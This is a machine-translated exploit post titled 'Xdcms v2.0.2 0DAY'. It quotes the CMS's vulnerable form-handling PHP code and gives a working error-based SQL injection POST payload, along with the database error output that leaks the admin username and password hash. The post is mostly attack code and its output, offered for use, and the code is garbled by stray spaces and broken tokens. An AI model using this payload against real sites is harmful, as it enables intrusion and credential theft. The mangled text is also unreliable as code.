Xdcms v2.0.2 0DAY

Start with the lists. php file in the location where the message is sent. <? Php class lists extends db {public function init () {$ input = base: load_class ('input'); $ formid = isset ($ _ GET ['formid '])? Intval ($ _ GET ['formid ']): 0; $ form_arr = base: load_cache ("cache_form", "_ form"); $ form = get_array ($ form_arr, 'id', $ formid, 0); $ field = base: load_cache ("cache_form _". $ form [0] ['form _ table'], "_ field"); $ fields = ""; if (is_array ($ field )) {foreach ($ field as $ value) {$ fields. = "<tr> n"; $ fields. = "<td align =" right "> ". $ value ['name']. ": </td> n"; $ fields. = "<td> ". $ input-> $ value ['formtype '] ($ value ['field'], '', $ value ['widt H'], $ value ['height'], $ value ['initial']). "". $ value ['explain ']. "</td> n"; $ fields. = "</tr> n" ;}// whether to display the verification code if ($ form ['0'] ['is _ Code'] = 1) {$ fields. = "<tr> n"; $ fields. = "<td align =" right "> Verification Code: </td> n"; $ fields. = "<td> <input type =" text "name =" verifycode "id =" verifycode "class =" txt "/> </td> n"; $ fields. = "</tr> n" ;}} assign ("form", $ form [0]); assign ("fields", $ fields); assign ('menu ', get_menu (0, 1); template ("form_list");} public function add_save () {// An error occurred while saving, from hi.baidu.com/w5r2 $ formid = safe_html ($ _ GET ['formid ']); $ form_arr = base: load_cache ("cache_form", "_ form "); $ form = get_array ($ form_arr, 'id', $ formid, 0); $ fields = $ _ POST ['fields']; $ verifyc Ode = $ _ POST ['verifycode']; // verification code if ($ form ['0'] ['is _ Code'] = 1 & $ verifycode! =_ _ SESSION ['code']) {showmsg (C ('verifycode _ error'), '-1 ');} if (empty ($ fields ['title']) | empty ($ formid) {showmsg (C ('material _ not_complete'), '-1 ');} $ form = formtable ($ formid); if (empty ($ form) {showmsg (C ('error'), '-1 ');} $ table = $ this-> mysql-> show_table (); // checks whether the data table exists if (! In_array (DB_PRE. $ form, $ table) {showmsg (C ('table _ not_exist '),'-1');} // Add an additional table $ SQL _fields = ''inputtime ''; $ SQL _value = datetime (); $ send_text = 'message content: <br> '; foreach ($ fields as $ key => $ value) {$ SQL _fields. = ",'". $ key. "'"; // you can see it. From hi.baidu.com/w5r2 if (is_array ($ value) {$ value_arr = ''; foreach ($ value as $ k =>$ v) {$ value_arr. = $ v. ',';} $ value = $ value_arr;} $ SQL _value. = ","". safe_replace (safe_html ($ val Ue )). "; $ send_text. = safe_replace (safe_html ($ value )). "<br>" ;}$ this-> mysql-> query ("insert ". DB_PRE. $ form. "({$ SQL _fields}) values ({$ SQL _value })"); // this address has an injection problem From www.admin163.net $ rs = $ this-> mysql-> get_one ("select * from ". DB_PRE. "form where id = ". $ formid); if ($ rs ['is _ email '] = 1) {sendmail (' Someone left you a message! ', $ Send_text);} showmsg (C ('add _ success'), '-1') ;}}?> Now let's take a look at the Code: http://127.0.0.1/xdcms_v2.0.2/index.php?m=form&c=lists&formid=7 POST data fields % 5 Btitle % 5D = 1 & fields % 5B ooxx ') values (201%, (select % 20 from (select % 20 count (*), concat (select % 20 (select % 20 (SELECT % 20 concat (0x6F756F757E, username, 0x2D, password, 0x7E31) % 20 FROM % 20c_admin % 20 limit % 200,1 )) % 20 from % 20information_schema.tables % 20 limit % 200,1), floor (rand (0) * 2) x % 20 from % 20information_schema.tables % 20 group % 20by % 20x) )) #] = 22 & fields % 5 Baddress % 5D = 4 & fields % 5 Bcontent % 5D = 55555 & verif Ycode = 9d53 & submit = + % CC % E1 + % BD % BB + database operation failure Duplicate entry 'ouou ~ Admin-5a0408a553574230cd46a508b03af127 ~ 11 'for key' group _ key' SQL: insert into c_message ('inputtime', 'title', 'ooxx') values, (select 1 from (select count (*), concat (select concat (0x6F756F757E, username, 0x2D, password, 0x7E31) FROM c_admin limit 0, 1 )) from information_schema.tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) # ', 'address', 'content ') values (1351247382, "1", "22", "4", "55555") OK.